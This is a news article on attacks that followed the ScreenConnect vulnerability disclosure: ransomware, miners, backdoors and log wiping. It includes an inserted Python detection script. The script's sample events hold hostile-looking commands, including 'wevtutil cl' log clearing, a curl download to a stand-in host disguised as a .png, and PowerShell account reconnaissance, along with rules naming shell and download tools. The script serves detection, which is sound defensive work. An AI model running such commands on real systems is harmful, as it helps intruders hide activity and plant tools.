Beehive of Hacker Activity Continues to Follow ConnectWise’s Vulnerability Disclosure

Cyber hackers had a field day following last month’s disclosure of a serious vulnerability in ConnectWise’s ScreenConnect remote support tool, attacking at least one MSP and its customers, according to reports.

Attackers tried various tricks to deliver malicious payloads, infiltrate systems to create new users and install code for later activity, and attempt to cover their tracks. These attempts occurred even though ConnectWise acted quickly to mitigate cloud-based ScreenConnect instances and release a patch for on-premise implementations. The company also paused functionality where possible for on-prem systems.

ConnectWise itself “did not experience a data breach, intrusion, or ransomware event,” the company clarified in a statement to MSP Success. A third party discovered the vulnerability and reported it to ConnectWise through a voluntary disclosure process.

“Once validated, ConnectWise mitigated all cloud instances of ScreenConnect within 48 hours. On February 19th, we released a patch for all on-prem ScreenConnect customers, posted a security bulletin on the ConnectWise Trust Center, and sent patching instructions to ScreenConnect customers,” the company said.

Despite its strong recommendation to patch on-premise systems, some customers did not act quickly enough. And threat actors couldn’t have been happier, launching all manner of attempts to exploit the vulnerability, according to a report released by Huntress, a managed security platform provider, about activity targeting its customers.

The vulnerability affected thousands of ScreenConnect servers, Huntress reported. “Unfortunately, many who were unable to patch in time suffered serious consequences. Attackers were using their new access to do all sorts of devious things, including dropping ransomware, cryptocurrency coin miners, and additional remote access [intended] to retain a presence on devices even after the ScreenConnect vulnerabilities were resolved.”

RMM Dilemma

Despite ConnectWise’s quick action to mitigate the ScreenConnect problem, concerns remain about the potential use of RMM software by cyber threat actors. By breaching remote management tools, hackers potentially open a gate to hundreds, even thousands, of organizations that use the tool.

Users view RMM software as a trusted source of patches and updates, and hackers know that. Because of that trust, users may not recognize attempts by hackers to use RMM to push out malware, John Hammond, principal security researcher at Huntress, told MSP Success.

“This category of software is a popular attack vector due to its high frequency of legitimate use. The frequent legitimate use allows the malicious use to often be missed by security tools,” he says.

RMM tools inadvertently give the same functionality to hackers and IT teams, Huntress CEO Kyle Hanslovan explained to media last month. “With remote access software, the bad guys can push ransomware as easily as the good guys can push a patch,” he said. That’s an issue that needs to be addressed, he says.

In its statement, ConnectWise acknowledged the problem: “While usually used for IT service delivery and product support, attackers can misuse remote control tools to facilitate malicious activities.”

Bag of Old Tricks

Exploits and attempted exploits of the ScreenConnect vulnerability by and large consisted of old tricks, according to Huntress. “It’s worth driving this point home: most of the post-compromise activities … aren’t novel, original, or outstanding. Most threat actors simply don’t know what to do beyond the same usual, procedural tradecraft.”

A number of adversaries, according to the Huntress report, took the opportunity to deploy ransomware variants such as LockBit. “We observed other ransomware attempts, like upd.exe and svchost.exe, that Microsoft Defender consistently neutralized.”

The appearance of LockBit, in particular, caught the attention of cybersecurity professionals because, as Matt Holland, founder and CEO of cybersecurity vendor Field Effect, noted, the LockBit ransomware group “was recently the target of a global takedown operation that seized its websites, crypto wallets, and data.”

Unlike other groups, which usually lie low and resurface with new branding and tools after similar takedowns, LockBit doubled down, he said. “They’ve made it clear they have no intention of leaving the ransomware business anytime soon. LockBit’s quick recovery demonstrates just how hard it is to permanently neutralize ransomware groups who seemingly regroup and re-tool as quickly as law enforcement agencies can take them down.”

In some cases, hackers sought to cover their tracks with attempts to remove event logs via wevtutil.exe cl “to frustrate investigators’ analysis at a later time.” The Huntress Managed EDR software caught these attempts.

One attacker tried to identify systems with the highest privileges within a network intending to take action at a later date, Huntress said.

Other malicious activity included the use of ScreenConnect access to deploy cryptocurrency coin miners. There were also attempts to install additional remote access tools to maintain a presence in the compromised systems after the “ScreenConnect fiasco has been cleared up,” Huntress said.

One hacker used ScreenConnect access to download and run an SSH backdoor, which would allow the attacker to bypass normal authentication systems. “We also observed an adversary download the SimpleHelp RMM via curl and rename the executables to .png’s in an attempt to evade detection,” Huntress said in its report.

Attempts to Move Deeper

Other cybersecurity vendors also detected activity involving ScreenConnect. Sophos saw multiple attempts to “move deeper into customer networks,” the vendor reported. One attacker used PowerShell to try “to obtain a list of local user accounts on the server.”

Another threat actor tried to disable Sophos endpoint protection. “Then they attempted to install a Cloudflare Tunnel client to be used as a backdoor, downloading it from Cloudflare’s GitHub page. They also ran a number of PowerShell commands in an attempt to carry out reconnaissance and establish persistence on the compromised server,” Sophos said.

In another instance, Sophos caught a threat actor pushing a remote access trojan (RAT) to vulnerable servers. Sophos analysts found the hacker was installing a new instance of the ScreenConnect client on an infected device. The hacker then used their own ScreenConnect client to talk to and remotely manage the target’s ScreenConnect server. “The infected device later launched various PowerShell commands,” Sophos reported.
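As an added illustration (not Huntress or Sophos code), the following Python runs three simple detections over constructed process-creation events for the behaviours described above: wevtutil log clearing, a download saved with an image extension, and the ScreenConnect service spawning shell or download tooling. The event fields, file paths and sample command lines are assumed, not taken from either vendor's telemetry.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation events (not real telemetry); field names are assumed.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "ScreenConnect.ClientService.exe", "image": "wevtutil.exe",
     "cmdline": "wevtutil.exe cl Security"},
    {"parent": "ScreenConnect.ClientService.exe", "image": "curl.exe",
     "cmdline": "curl.exe -o C:\\Users\\Public\\logo.png https://example.invalid/agent"},
    {"parent": "ScreenConnect.ClientService.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-LocalUser"},
    {"parent": "explorer.exe", "image": "wevtutil.exe",
     "cmdline": "wevtutil.exe qe Application /c:5"},   # benign query, not a clear
    {"parent": "explorer.exe", "image": "curl.exe",
     "cmdline": "curl.exe -o C:\\Temp\\report.pdf https://example.invalid/r"},
]

LOLBIN_CHILDREN = {"powershell.exe", "cmd.exe", "curl.exe", "cloudflared.exe"}
EXE_MAGIC = b"MZ"  # every PE executable starts with these two bytes

def image_name(path: str) -> str:
    """Strip any directory part and lower-case the executable name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches (empty list = nothing flagged)."""
    hits: List[str] = []
    image, parent = image_name(ev["image"]), image_name(ev["parent"])
    cmd = ev["cmdline"].lower()
    # Rule 1: event-log clearing via 'wevtutil cl' / 'clear-log', whoever the parent is.
    if image == "wevtutil.exe" and re.search(r"\s(cl|clear-log)\s", cmd):
        hits.append("eventlog_cleared")
    # Rule 2: a download tool writing its output under an image extension.
    if image == "curl.exe" and re.search(r"\s-o\s+\S+\.(png|jpg|gif)\b", cmd):
        hits.append("download_masquerading_as_image")
    # Rule 3: the ScreenConnect service itself spawning shell or download tooling.
    if parent.startswith("screenconnect") and image in LOLBIN_CHILDREN:
        hits.append("screenconnect_spawned_lolbin")
    return hits

def looks_like_renamed_executable(filename: str, head: bytes) -> bool:
    """True when a file named like an image actually starts with the PE 'MZ' signature."""
    return filename.lower().endswith((".png", ".jpg", ".gif")) and head.startswith(EXE_MAGIC)

def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Pair each event index with every rule it triggers."""
    return [(i, h) for i, ev in enumerate(events) for h in classify(ev)]

if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {hit} :: {SAMPLE_EVENTS[idx]['cmdline']}")
```

On the constructed sample, the two explorer.exe events (a log query and a PDF download) pass clean, while the three events parented by the ScreenConnect service each trigger at least one rule.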

The cyber research team at InsurSec provider At-Bay found that attackers targeted an MSP, “which led to its customers being impacted in what could be classified as a supply chain attack.”

Field Effect’s Holland warned the exploitation of ScreenConnect vulnerabilities by LockBit and other ransomware actors likely will persist as long as vulnerable servers remain exposed to the internet. “It’s vital that MSPs check across their clients’ environments for vulnerable ScreenConnect servers and either uninstall, disable, or block external connectivity to the servers,” he said.

ABOUT THE AUTHOR
Pedro Pereira is a freelance writer in New Hampshire who has covered the IT channel for two decades. 